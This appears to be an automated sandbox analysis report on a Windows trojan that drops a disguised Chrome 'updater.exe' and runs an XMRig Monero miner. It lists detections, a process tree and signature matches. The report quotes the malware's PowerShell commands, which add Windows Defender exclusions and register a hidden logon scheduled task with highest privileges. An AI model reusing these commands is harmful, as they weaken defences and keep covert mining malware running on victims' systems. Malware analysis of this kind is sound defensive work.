Edit tour

Windows Analysis Report
ylVAEHbMLf.exe

Overview

General Information

Sample name:	ylVAEHbMLf.exe renamed because original name is a hash value
Original sample name:	3fb477ee2214bf2d4ed7df2d23f159e8.exe
Analysis ID:	1528506
MD5:	3fb477ee2214bf2d4ed7df2d23f159e8
SHA1:	836c3f3b4b8f02e495703767b6bf923c453dba36
SHA256:	508821549db3334cccd6d492e17b29343ea5d0bda03379188c083e8c2217c291
Tags:	64exetrojan
Infos:

Detection

Xmrig

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Yara detected Xmrig cryptocurrency miner

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Allocates memory in foreign processes

Contains functionality to compare user and computer (likely to detect sandboxes)

Contains functionality to inject code into remote processes

Creates a thread in another existing process (thread injection)

Found direct / indirect Syscall (likely to bypass EDR)

Found hidden mapped module (file has been removed from disk)

Hooks files or directories query functions (used to hide files and directories)

Hooks processes query functions (used to hide processes)

Hooks registry keys query functions (used to hide registry keys)

Injects a PE file into a foreign processes

Injects code into the Windows Explorer (explorer.exe)

Installs new ROOT certificates

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Modifies the prolog of user mode functions (user mode inline hooks)

Protects its processes via BreakOnTermination flag

Sample is not signed and drops a device driver

Sigma detected: Invoke-Obfuscation CLIP+ Launcher

Sigma detected: Invoke-Obfuscation VAR+ Launcher

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Suspicious powershell command line found

Writes to foreign memory regions

Yara detected PersistenceViaHiddenTask

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query CPU information (cpuid)

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates driver files

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evasive API chain (may stop execution after accessing registry keys)

Found evasive API chain checking for process token information

Found large amount of non-executed APIs

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

PE file contains more sections than normal

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Powershell Defender Exclusion

Sigma detected: Uncommon Svchost Parent Process

Stores large binary data to the registry

Suricata IDS alerts with low severity for network traffic

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara signature match

Classification

Process Tree

System is w10x64

ylVAEHbMLf.exe (PID: 6952 cmdline: "C:\Users\user\Desktop\ylVAEHbMLf.exe" MD5: 3FB477EE2214BF2D4ED7DF2D23F159E8)

dialer.exe (PID: 5796 cmdline: C:\Windows\System32\dialer.exe MD5: B2626BDCF079C6516FC016AC5646DF93)

winlogon.exe (PID: 552 cmdline: winlogon.exe MD5: F8B41A1B3E569E7E6F990567F21DCE97)

lsass.exe (PID: 628 cmdline: C:\Windows\system32\lsass.exe MD5: A1CC00332BBF370654EE3DC8CDC8C95A)

svchost.exe (PID: 920 cmdline: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

dwm.exe (PID: 988 cmdline: "dwm.exe" MD5: 5C27608411832C5B39BA04E33D53536C)

svchost.exe (PID: 364 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 356 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 696 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 592 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1044 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

updater.exe (PID: 6184 cmdline: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe MD5: 3FB477EE2214BF2D4ED7DF2D23F159E8)

dialer.exe (PID: 6252 cmdline: C:\Windows\System32\dialer.exe MD5: B2626BDCF079C6516FC016AC5646DF93)

svchost.exe (PID: 1572 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s FontCache MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1652 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1724 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1824 cmdline: C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1840 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1940 cmdline: C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1948 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1956 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 2036 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

spoolsv.exe (PID: 1932 cmdline: C:\Windows\System32\spoolsv.exe MD5: 0D4B1E3E4488E9BDC035F23E1F4FE22F)

svchost.exe (PID: 2064 cmdline: C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 2152 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 2268 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 2388 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1084 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1200 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1252 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1296 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1316 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1408 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s nsi MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1488 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1496 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1552 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

powershell.exe (PID: 7000 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7032 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

conhost.exe (PID: 3632 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 2872 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#lbfytpia#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'HtfsFileManager' /tr '''C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'HtfsFileManager' -RunLevel 'Highest' -Force; } MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 2256 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

conhost.exe (PID: 928 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 4296 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 6016 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 6996 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#lbfytpia#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'HtfsFileManager' /tr '''C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'HtfsFileManager' -RunLevel 'Highest' -Force; } MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 3288 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
xmrig	According to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.	No Attribution	https://gridinsoft.com/xmrig https://www.akamai.com/blog/security-research/2024-php-exploit-cve-one-day-after-disclosure https://www.crowdstrike.com/blog/new-kiss-a-dog-cryptojacking-campaign-targets-docker-and-kubernetes/	https://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
0000000F.00000002.2995389438.000001845B502000.00000004.00000001.00020000.00000000.sdmp	JoeSecurity_PersistenceViaHiddenTask	Yara detected PersistenceViaHiddenTask	Joe Security
0000000F.00000000.1804050356.000001845BC48000.00000004.00000001.00020000.00000000.sdmp	JoeSecurity_PersistenceViaHiddenTask	Yara detected PersistenceViaHiddenTask	Joe Security
0000000F.00000002.3020568430.000001845BC48000.00000004.00000001.00020000.00000000.sdmp	JoeSecurity_PersistenceViaHiddenTask	Yara detected PersistenceViaHiddenTask	Joe Security
00000015.00000002.2005902110.00007FF750F7B000.00000004.00000001.01000000.00000008.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000015.00000002.2005902110.00007FF750F7B000.00000004.00000001.01000000.00000008.sdmp	MacOS_Cryptominer_Xmrig_241780a1	unknown	unknown	0x5153a8:$a1: mining.set_target 0x510b88:$a2: XMRIG_HOSTNAME 0x512680:$a3: Usage: xmrig [OPTIONS] 0x510b60:$a4: XMRIG_VERSION
Process Memory Space: svchost.exe PID: 1044	JoeSecurity_PersistenceViaHiddenTask	Yara detected PersistenceViaHiddenTask	Joe Security
Click to see the 1 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
21.2.updater.exe.7ff750fc1860.5.raw.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
21.2.updater.exe.7ff750fc1860.5.raw.unpack	MacOS_Cryptominer_Xmrig_241780a1	unknown	unknown	0x4ceb48:$a1: mining.set_target 0x4ca328:$a2: XMRIG_HOSTNAME 0x4cbe20:$a3: Usage: xmrig [OPTIONS] 0x4ca300:$a4: XMRIG_VERSION
21.2.updater.exe.7ff750fc1860.5.raw.unpack	MAL_XMR_Miner_May19_1	Detects Monero Crypto Coin Miner	Florian Roth	0x4d4b21:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
21.2.updater.exe.7ff750fc1860.5.raw.unpack	MALWARE_Win_CoinMiner02	Detects coinmining malware	ditekSHen	0x4d5080:$s1: %s/%s (Windows NT %lu.%lu 0x4d58a8:$s3: \\.\WinRing0_ 0x4cdda8:$s4: pool_wallet 0x4c9bb0:$s5: cryptonight 0x4c9bc0:$s5: cryptonight 0x4c9bd0:$s5: cryptonight 0x4c9be0:$s5: cryptonight 0x4c9bf8:$s5: cryptonight 0x4c9c08:$s5: cryptonight 0x4c9c18:$s5: cryptonight 0x4c9c30:$s5: cryptonight 0x4c9c40:$s5: cryptonight 0x4c9c58:$s5: cryptonight 0x4c9c70:$s5: cryptonight 0x4c9c80:$s5: cryptonight 0x4c9c90:$s5: cryptonight 0x4c9ca0:$s5: cryptonight 0x4c9cb8:$s5: cryptonight 0x4c9cd0:$s5: cryptonight 0x4c9ce0:$s5: cryptonight 0x4c9cf0:$s5: cryptonight
21.2.updater.exe.7ff750f60000.4.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
21.2.updater.exe.7ff750f60000.4.unpack	MacOS_Cryptominer_Xmrig_241780a1	unknown	unknown	0x52eda8:$a1: mining.set_target 0x52a588:$a2: XMRIG_HOSTNAME 0x52c080:$a3: Usage: xmrig [OPTIONS] 0x52a560:$a4: XMRIG_VERSION
21.2.updater.exe.7ff750f60000.4.unpack	MAL_XMR_Miner_May19_1	Detects Monero Crypto Coin Miner	Florian Roth	0x534d81:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
21.2.updater.exe.7ff750f60000.4.unpack	MALWARE_Win_CoinMiner02	Detects coinmining malware	ditekSHen	0x5352e0:$s1: %s/%s (Windows NT %lu.%lu 0x535b08:$s3: \\.\WinRing0_ 0x52e008:$s4: pool_wallet 0x529e10:$s5: cryptonight 0x529e20:$s5: cryptonight 0x529e30:$s5: cryptonight 0x529e40:$s5: cryptonight 0x529e58:$s5: cryptonight 0x529e68:$s5: cryptonight 0x529e78:$s5: cryptonight 0x529e90:$s5: cryptonight 0x529ea0:$s5: cryptonight 0x529eb8:$s5: cryptonight 0x529ed0:$s5: cryptonight 0x529ee0:$s5: cryptonight 0x529ef0:$s5: cryptonight 0x529f00:$s5: cryptonight 0x529f18:$s5: cryptonight 0x529f30:$s5: cryptonight 0x529f40:$s5: cryptonight 0x529f50:$s5: cryptonight
21.2.updater.exe.7ff750f7ea80.6.raw.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
21.2.updater.exe.7ff750f7ea80.6.raw.unpack	MacOS_Cryptominer_Xmrig_241780a1	unknown	unknown	0x511928:$a1: mining.set_target 0x50d108:$a2: XMRIG_HOSTNAME 0x50ec00:$a3: Usage: xmrig [OPTIONS] 0x50d0e0:$a4: XMRIG_VERSION
21.2.updater.exe.7ff750f7ea80.6.raw.unpack	MAL_XMR_Miner_May19_1	Detects Monero Crypto Coin Miner	Florian Roth	0x517901:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
21.2.updater.exe.7ff750f7ea80.6.raw.unpack	MALWARE_Win_CoinMiner02	Detects coinmining malware	ditekSHen	0x517e60:$s1: %s/%s (Windows NT %lu.%lu 0x518688:$s3: \\.\WinRing0_ 0x510b88:$s4: pool_wallet 0x50c990:$s5: cryptonight 0x50c9a0:$s5: cryptonight 0x50c9b0:$s5: cryptonight 0x50c9c0:$s5: cryptonight 0x50c9d8:$s5: cryptonight 0x50c9e8:$s5: cryptonight 0x50c9f8:$s5: cryptonight 0x50ca10:$s5: cryptonight 0x50ca20:$s5: cryptonight 0x50ca38:$s5: cryptonight 0x50ca50:$s5: cryptonight 0x50ca60:$s5: cryptonight 0x50ca70:$s5: cryptonight 0x50ca80:$s5: cryptonight 0x50ca98:$s5: cryptonight 0x50cab0:$s5: cryptonight 0x50cac0:$s5: cryptonight 0x50cad0:$s5: cryptonight
21.2.updater.exe.7ff750f9fc40.7.raw.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
21.2.updater.exe.7ff750f9fc40.7.raw.unpack	MacOS_Cryptominer_Xmrig_241780a1	unknown	unknown	0x4f0768:$a1: mining.set_target 0x4ebf48:$a2: XMRIG_HOSTNAME 0x4eda40:$a3: Usage: xmrig [OPTIONS] 0x4ebf20:$a4: XMRIG_VERSION
21.2.updater.exe.7ff750f9fc40.7.raw.unpack	MAL_XMR_Miner_May19_1	Detects Monero Crypto Coin Miner	Florian Roth	0x4f6741:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
21.2.updater.exe.7ff750f9fc40.7.raw.unpack	MALWARE_Win_CoinMiner02	Detects coinmining malware	ditekSHen	0x4f6ca0:$s1: %s/%s (Windows NT %lu.%lu 0x4f74c8:$s3: \\.\WinRing0_ 0x4ef9c8:$s4: pool_wallet 0x4eb7d0:$s5: cryptonight 0x4eb7e0:$s5: cryptonight 0x4eb7f0:$s5: cryptonight 0x4eb800:$s5: cryptonight 0x4eb818:$s5: cryptonight 0x4eb828:$s5: cryptonight 0x4eb838:$s5: cryptonight 0x4eb850:$s5: cryptonight 0x4eb860:$s5: cryptonight 0x4eb878:$s5: cryptonight 0x4eb890:$s5: cryptonight 0x4eb8a0:$s5: cryptonight 0x4eb8b0:$s5: cryptonight 0x4eb8c0:$s5: cryptonight 0x4eb8d8:$s5: cryptonight 0x4eb8f0:$s5: cryptonight 0x4eb900:$s5: cryptonight 0x4eb910:$s5: cryptonight
Click to see the 11 entries

Sigma Signatures

System Summary

Sigma detected: Invoke-Obfuscation CLIP+ Launcher

Source: Process started

Author: Jonathan Cheong, oscd.community: Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#lbfytpia#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'HtfsFileManager' /tr '''C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'HtfsFileManager' -RunLevel 'Highest' -Force; }, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#lbfytpia#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'HtfsFileManager' /tr '''C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'HtfsFileManager' -RunLevel 'Highest' -Force; }, CommandLine|base64offset|contains: [, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#lbfytpia#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'HtfsFileManager' /tr '''C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'HtfsFileManager' -RunLevel 'Highest' -Force; }, ProcessId: 2872, ProcessName: powershell.exe

Sigma detected: Invoke-Obfuscation VAR+ Launcher

Source: Process started

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, ProcessId: 7000, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: C:\Windows\System32\dialer.exe, ParentImage: C:\Windows\System32\dialer.exe, ParentProcessId: 5796, ParentProcessName: dialer.exe, ProcessCommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, ProcessId: 920, ProcessName: svchost.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, ProcessId: 7000, ProcessName: powershell.exe

Suricata Signatures

ET COINMINER CoinMiner Domain in DNS Lookup (pool .hashvault .pro)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-08T00:27:19.040132+0200	2036289	2	Crypto Currency Mining Activity Detected	192.168.2.4	51734	1.1.1.1	53	UDP

ETPRO COINMINER XMR CoinMiner Usage

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-08T00:26:50.151198+0200	2826930	2	Crypto Currency Mining Activity Detected	192.168.2.4	49736	45.76.89.70	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: ylVAEHbMLf.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\yfiogronfirx.tmp	Avira: detection malicious, Label: HEUR/AGEN.1362356
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Avira: detection malicious, Label: HEUR/AGEN.1329646

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe

ReversingLabs: Detection: 55%

Multi AV Scanner detection for submitted file

Source: ylVAEHbMLf.exe

ReversingLabs: Detection: 55%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: ylVAEHbMLf.exe

Joe Sandbox ML: detected

Bitcoin Miner

Yara detected Xmrig cryptocurrency miner

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 21.2.updater.exe.7ff750fc1860.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.updater.exe.7ff750f60000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.updater.exe.7ff750f7ea80.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.updater.exe.7ff750f9fc40.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000015.00000002.2005902110.00007FF750F7B000.00000004.00000001.01000000.00000008.sdmp, type: MEMORY

Source: ylVAEHbMLf.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: .@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000010.00000002.2965617934.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811378915.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: .@\??\C:\Users\user\AppData\Local\Temp\wctAB5F.tmp.pdb source: svchost.exe, 00000010.00000002.2963911331.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811343209.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: (@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 00000010.00000002.2962181517.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811264979.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 00000010.00000002.2963911331.000001ADEC04C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811343209.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000010.00000002.2963911331.000001ADEC04C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811343209.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
